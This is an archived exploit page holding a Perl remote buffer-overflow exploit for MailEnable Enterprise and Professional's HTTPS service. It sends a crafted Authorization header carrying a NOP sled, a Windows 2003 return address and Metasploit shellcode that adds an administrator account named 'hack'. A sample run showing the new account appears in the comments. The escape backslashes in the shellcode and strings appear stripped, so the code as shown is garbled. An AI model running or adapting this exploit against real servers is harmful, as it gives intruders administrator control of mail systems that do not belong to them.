MailEnable Enterprise & Professional https Remote BoF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MailEnable Enterprise & Professional https Remote BoF Exploit
# Published : 2005-04-25
# Author : CorryL
# Previous Title : Snmppd SNMP Proxy Daemon Remote Format String Exploit
# Next Title : MySQL MaxDB Webtool <= 7.5.00.23 Remote Stack Overflow Exploit

#!/usr/bin/perl
# This tools and to consider only himself to educational purpose
#
# 
#-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-
#-=[                                                               ]=-
#-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-
#-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-
#
#[+]Connecting to 127.0.0.1
#[+]Sending Evil Request
#[+]Creating Administrator User
#Connect to 127.0.0.1 Using User (hack) Pass (hack)
#
#D:Documents and SettingsAdministratorDesktopprova bofmailenable-bug+exploit
#>net users
#
#Account utente per \SERVER
#
#-------------------------------------------------------------------------------
#__vmware_user__          Administrator            ASPNET
#Guest                    hack                     IME_ADMIN
#IME_USER                 IUSR_SERVER              IWAM_SERVER
#SUPPORT_388945a0
#Esecuzione comando riuscita.
#
#
#Greatz All Users & Friends on irc.xoned.net #x0n3-h4ck


use IO::Socket; 
$ret = "x6cx36xb7"; #RET For Win2003
$nop = "x90"x24;
#win32_adduser -  PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x33xc9x83xe9xcaxd9xeexd9x74x24xf4x5bx81x73x13xc7".
"x7ex10xf5x83xebxfcxe2xf4x3bx96x56xf5xc7x7ex9bxb0".
"xfbxf5x6cxf0xbfx7fxffx7ex88x66x9bxaaxe7x7fxfbx16".
"xe9x37x9bxc1x4cx7fxfexc4x07xe7xbcx71x07x0ax17x34".
"x0dx73x11x37x2cx8ax2bxa1xe3x7ax65x16x4cx21x34xf4".
"x2cx18x9bxf9x8cxf5x4fxe9xc6x95x9bxe9x4cx7fxfbx7c".
"x9bx5ax14x36xf6xbex74x7ex87x4ex95x35xbfx71x9bxb5".
"xcbxf5x60xe9x6axf5x78xfdx2ex75x10xf5xc7xf5x50xc1".
"xc2x02x10xf5xc7xf5x78xc9x98x4fxe6x95x91x95x1dx9d".
"x28xb0xf0x95xafxe6xeex7fxc9x29xefx12x2fx90xefx0a".
"x38x1dx7dx91xe9x1bx68x90xe7x51x73xd5xa9x1bx64xd5".
"xb2x0dx75x87xe7x16x71x96xacx5ex78x94xa4x15x30xda".
"x86x3ax54xd5xe1x58x30x9bxa2x0ax30x99xa8x1dx71x99".
"xa0x0cx7fx80xb7x5ex51x91xaax17x7ex9cxb4x0ax62x94".
"xb3x11x62x86xe7x16x71x96xacx5ex3fxb4x83x3ax10xf5";

use Getopt::Std; getopts('h:', %args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "n-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-n";
print STDERR "-=[                                                               ]=-n";
print STDERR "-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-nn";

if (!defined($host)) {
Usage();
}

$bof = $nop.$shellcode.$ret;
$ric = "GET / HTTP/1.0rn";
$ric2 = "Authorization: $bofrnrn";
$richiesta = $ric.$ric2;
print "[+]Connecting to $hostn";
sleep 2;
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 8080,
                                Proto => 'tcp');
                                die unless $socket;
                                print "[+]Sending Evil Requestn";
                                sleep 2;
                                print $socket "$richiesta";
                                print "[+]Creating Administrator Usern";
                                print "Connect to $host Using User (hack) Pass (hack)n";
                                
                               
close;

sub Usage {
print STDERR "Usage:
-h Victim host.nn";
exit;
}

# www.Syue.com [2005-04-25]